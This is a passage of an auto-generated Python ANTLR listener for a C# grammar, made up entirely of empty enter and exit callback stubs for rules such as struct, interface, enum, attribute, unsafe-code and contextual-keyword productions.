def enterStruct_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_body.
def exitStruct_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_member_declarations.
def enterStruct_member_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_member_declarations.
def exitStruct_member_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_member_declaration.
def enterStruct_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_member_declaration.
def exitStruct_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#array_type121.
def enterArray_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#array_type121.
def exitArray_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#non_array_type121.
def enterNon_array_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#non_array_type121.
def exitNon_array_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#rank_specifiers.
def enterRank_specifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#rank_specifiers.
def exitRank_specifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#rank_specifier.
def enterRank_specifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#rank_specifier.
def exitRank_specifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#dim_separators.
def enterDim_separators(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#dim_separators.
def exitDim_separators(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#array_initializer.
def enterArray_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#array_initializer.
def exitArray_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variable_initializer_list.
def enterVariable_initializer_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variable_initializer_list.
def exitVariable_initializer_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_declaration.
def enterInterface_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_declaration.
def exitInterface_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_modifiers.
def enterInterface_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_modifiers.
def exitInterface_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_modifier.
def enterInterface_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_modifier.
def exitInterface_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variant_type121_parameter_list.
def enterVariant_type121_parameter_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variant_type121_parameter_list.
def exitVariant_type121_parameter_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variant_type121_parameters.
def enterVariant_type121_parameters(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variant_type121_parameters.
def exitVariant_type121_parameters(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variance_annotation.
def enterVariance_annotation(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variance_annotation.
def exitVariance_annotation(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_base.
def enterInterface_base(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_base.
def exitInterface_base(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_body.
def enterInterface_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_body.
def exitInterface_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_member_declarations.
def enterInterface_member_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_member_declarations.
def exitInterface_member_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_member_declaration.
def enterInterface_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_member_declaration.
def exitInterface_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_method_declaration.
def enterInterface_method_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_method_declaration.
def exitInterface_method_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_property_declaration.
def enterInterface_property_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_property_declaration.
def exitInterface_property_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_accessors.
def enterInterface_accessors(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_accessors.
def exitInterface_accessors(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_event_declaration.
def enterInterface_event_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_event_declaration.
def exitInterface_event_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_indexer_declaration.
def enterInterface_indexer_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_indexer_declaration.
def exitInterface_indexer_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_declaration.
def enterEnum_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_declaration.
def exitEnum_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_base.
def enterEnum_base(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_base.
def exitEnum_base(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_body.
def enterEnum_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_body.
def exitEnum_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_modifiers.
def enterEnum_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_modifiers.
def exitEnum_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_modifier.
def enterEnum_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_modifier.
def exitEnum_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_member_declarations.
def enterEnum_member_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_member_declarations.
def exitEnum_member_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_member_declaration.
def enterEnum_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_member_declaration.
def exitEnum_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_declaration.
def enterDelegate_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_declaration.
def exitDelegate_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_modifiers.
def enterDelegate_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_modifiers.
def exitDelegate_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_modifier.
def enterDelegate_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_modifier.
def exitDelegate_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#global_attributes.
def enterGlobal_attributes(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#global_attributes.
def exitGlobal_attributes(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_sections.
def enterGlobal_attribute_sections(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_sections.
def exitGlobal_attribute_sections(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_section.
def enterGlobal_attribute_section(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_section.
def exitGlobal_attribute_section(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_target_specifier.
def enterGlobal_attribute_target_specifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_target_specifier.
def exitGlobal_attribute_target_specifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_target.
def enterGlobal_attribute_target(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_target.
def exitGlobal_attribute_target(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attributes.
def enterAttributes(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attributes.
def exitAttributes(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_sections.
def enterAttribute_sections(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_sections.
def exitAttribute_sections(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_section.
def enterAttribute_section(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_section.
def exitAttribute_section(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_target_specifier.
def enterAttribute_target_specifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_target_specifier.
def exitAttribute_target_specifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_target.
def enterAttribute_target(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_target.
def exitAttribute_target(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_list.
def enterAttribute_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_list.
def exitAttribute_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute.
def enterAttribute(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute.
def exitAttribute(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_name.
def enterAttribute_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_name.
def exitAttribute_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_arguments.
def enterAttribute_arguments(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_arguments.
def exitAttribute_arguments(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#positional_argument_list.
def enterPositional_argument_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#positional_argument_list.
def exitPositional_argument_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#positional_argument.
def enterPositional_argument(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#positional_argument.
def exitPositional_argument(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#named_argument_list.
def enterNamed_argument_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#named_argument_list.
def exitNamed_argument_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#named_argument.
def enterNamed_argument(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#named_argument.
def exitNamed_argument(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_argument_expression.
def enterAttribute_argument_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_argument_expression.
def exitAttribute_argument_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_modifier_unsafe.
def enterClass_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_modifier_unsafe.
def exitClass_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_modifier_unsafe.
def enterStruct_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_modifier_unsafe.
def exitStruct_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_modifier_unsafe.
def enterInterface_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_modifier_unsafe.
def exitInterface_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_modifier_unsafe.
def enterDelegate_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_modifier_unsafe.
def exitDelegate_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#field_modifier_unsafe.
def enterField_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#field_modifier_unsafe.
def exitField_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_modifier_unsafe.
def enterMethod_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_modifier_unsafe.
def exitMethod_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#property_modifier_unsafe.
def enterProperty_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#property_modifier_unsafe.
def exitProperty_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#event_modifier_unsafe.
def enterEvent_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#event_modifier_unsafe.
def exitEvent_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_modifier_unsafe.
def enterIndexer_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_modifier_unsafe.
def exitIndexer_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_modifier_unsafe.
def enterOperator_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_modifier_unsafe.
def exitOperator_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_modifier_unsafe.
def enterConstructor_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_modifier_unsafe.
def exitConstructor_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_declaration_unsafe.
def enterDestructor_declaration_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_declaration_unsafe.
def exitDestructor_declaration_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_modifiers_unsafe.
def enterStatic_constructor_modifiers_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_modifiers_unsafe.
def exitStatic_constructor_modifiers_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#embedded_statement_unsafe.
def enterEmbedded_statement_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#embedded_statement_unsafe.
def exitEmbedded_statement_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unsafe_statement.
def enterUnsafe_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unsafe_statement.
def exitUnsafe_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_unsafe.
def enterType121_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_unsafe.
def exitType121_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#pointer_type121.
def enterPointer_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#pointer_type121.
def exitPointer_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unmanaged_type121.
def enterUnmanaged_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unmanaged_type121.
def exitUnmanaged_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#primary_no_array_creation_expression_unsafe.
def enterPrimary_no_array_creation_expression_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#primary_no_array_creation_expression_unsafe.
def exitPrimary_no_array_creation_expression_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unary_expression_unsafe.
def enterUnary_expression_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unary_expression_unsafe.
def exitUnary_expression_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#pointer_indirection_expression.
def enterPointer_indirection_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#pointer_indirection_expression.
def exitPointer_indirection_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#addressof_expression.
def enterAddressof_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#addressof_expression.
def exitAddressof_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#sizeof_expression.
def enterSizeof_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#sizeof_expression.
def exitSizeof_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_statement.
def enterFixed_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_statement.
def exitFixed_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_pointer_declarators.
def enterFixed_pointer_declarators(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_pointer_declarators.
def exitFixed_pointer_declarators(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_pointer_declarator.
def enterFixed_pointer_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_pointer_declarator.
def exitFixed_pointer_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_pointer_initializer.
def enterFixed_pointer_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_pointer_initializer.
def exitFixed_pointer_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_member_declaration_unsafe.
def enterStruct_member_declaration_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_member_declaration_unsafe.
def exitStruct_member_declaration_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_declaration.
def enterFixed_size_buffer_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_declaration.
def exitFixed_size_buffer_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_modifiers.
def enterFixed_size_buffer_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_modifiers.
def exitFixed_size_buffer_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_modifier.
def enterFixed_size_buffer_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_modifier.
def exitFixed_size_buffer_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#buffer_element_type121.
def enterBuffer_element_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#buffer_element_type121.
def exitBuffer_element_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_declarators.
def enterFixed_size_buffer_declarators(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_declarators.
def exitFixed_size_buffer_declarators(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_declarator.
def enterFixed_size_buffer_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_declarator.
def exitFixed_size_buffer_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_initializer_unsafe.
def enterLocal_variable_initializer_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_initializer_unsafe.
def exitLocal_variable_initializer_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#stackalloc_initializer.
def enterStackalloc_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#stackalloc_initializer.
def exitStackalloc_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#from_contextual_keyword.
def enterFrom_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#from_contextual_keyword.
def exitFrom_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#let_contextual_keyword.
def enterLet_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#let_contextual_keyword.
def exitLet_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#where_contextual_keyword.
def enterWhere_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#where_contextual_keyword.
def exitWhere_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#join_contextual_keyword.
def enterJoin_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#join_contextual_keyword.
def exitJoin_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#on_contextual_keyword.
def enterOn_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#on_contextual_keyword.
def exitOn_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#equals_contextual_keyword.
def enterEquals_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#equals_contextual_keyword.
def exitEquals_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#into_contextual_keyword.
def enterInto_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#into_contextual_keyword.
def exitInto_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#orderby_contextual_keyword.
def enterOrderby_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#orderby_contextual_keyword.
def exitOrderby_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#ascending_contextual_keyword.
def enterAscending_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#ascending_contextual_keyword.
def exitAscending_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#descending_contextual_keyword.
def enterDescending_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#descending_contextual_keyword.
def exitDescending_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#select_contextual_keyword.
def enterSelect_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#select_contextual_keyword.
def exitSelect_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#group_contextual_keyword.
def enterGroup_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#group_contextual_keyword.
def exitGroup_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#by_contextual_keyword.
def enterBy_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#by_contextual_keyword.
def exitBy_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#partial_contextual_keyword.
def enterPartial_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#partial_contextual_keyword.
def exitPartial_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#alias_contextual_keyword.
def enterAlias_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#alias_contextual_keyword.
def exitAlias_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#yield_contextual_keyword.
def enterYield_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#yield_contextual_keyword.
def exitYield_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#get_contextual_keyword.
def enterGet_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#get_contextual_keyword.
def exitGet_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#set_contextual_keyword.
def enterSet_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#set_contextual_keyword.
def exitSet_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#add_contextual_keyword.
def enterAdd_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#add_contextual_keyword.
def exitAdd_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#remove_contextual_keyword.
def enterRemove_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#remove_contextual_keyword.
def exitRemove_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#dynamic_contextual_keyword.
def enterDynamic_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#dynamic_contextual_keyword.
def exitDynamic_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#arglist.
def enterArglist(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#arglist.
def exitArglist(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#right_arrow.
def enterRight_arrow(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#right_arrow.
def exitRight_arrow(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#right_shift.
def enterRight_shift(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#right_shift.
def exitRight_shift(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#right_shift_assignment.
def enterRight_shift_assignment(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#right_shift_assignment.
def exitRight_shift_assignment(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#literal.
def enterLiteral(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#literal.
def exitLiteral(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#boolean_literal.
def enterBoolean_literal(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#boolean_literal.
def exitBoolean_literal(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#keyword.
def enterKeyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#keyword.
def exitKeyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_definition.
def enterClass_definition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_definition.
def exitClass_definition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_definition.
def enterStruct_definition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_definition.
def exitStruct_definition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_definition.
def enterInterface_definition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_definition.
def exitInterface_definition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_definition.
def enterEnum_definition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_definition.
def exitEnum_definition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_definition.
def enterDelegate_definition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_definition.
def exitDelegate_definition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#event_declaration2.
def enterEvent_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#event_declaration2.
def exitEvent_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#field_declaration2.
def enterField_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#field_declaration2.
def exitField_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#property_declaration2.
def enterProperty_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#property_declaration2.
def exitProperty_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constant_declaration2.
def enterConstant_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constant_declaration2.
def exitConstant_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_declaration2.
def enterIndexer_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_declaration2.
def exitIndexer_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_definition.
def enterDestructor_definition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_definition.
def exitDestructor_definition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_declaration2.
def enterConstructor_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_declaration2.
def exitConstructor_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_declaration2.
def enterMethod_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_declaration2.
def exitMethod_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_member_name.
def enterMethod_member_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_member_name.
def exitMethod_member_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_member_name2.
def enterMethod_member_name2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_member_name2.
def exitMethod_member_name2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_declaration2.
def enterOperator_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_declaration2.
def exitOperator_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_method_declaration2.
def enterInterface_method_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_method_declaration2.
def exitInterface_method_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_property_declaration2.
def enterInterface_property_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_property_declaration2.
def exitInterface_property_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_event_declaration2.
def enterInterface_event_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_event_declaration2.
def exitInterface_event_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_indexer_declaration2.
def enterInterface_indexer_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_indexer_declaration2.
def exitInterface_indexer_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_access2.
def enterMember_access2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_access2.
def exitMember_access2(self, ctx):
pass
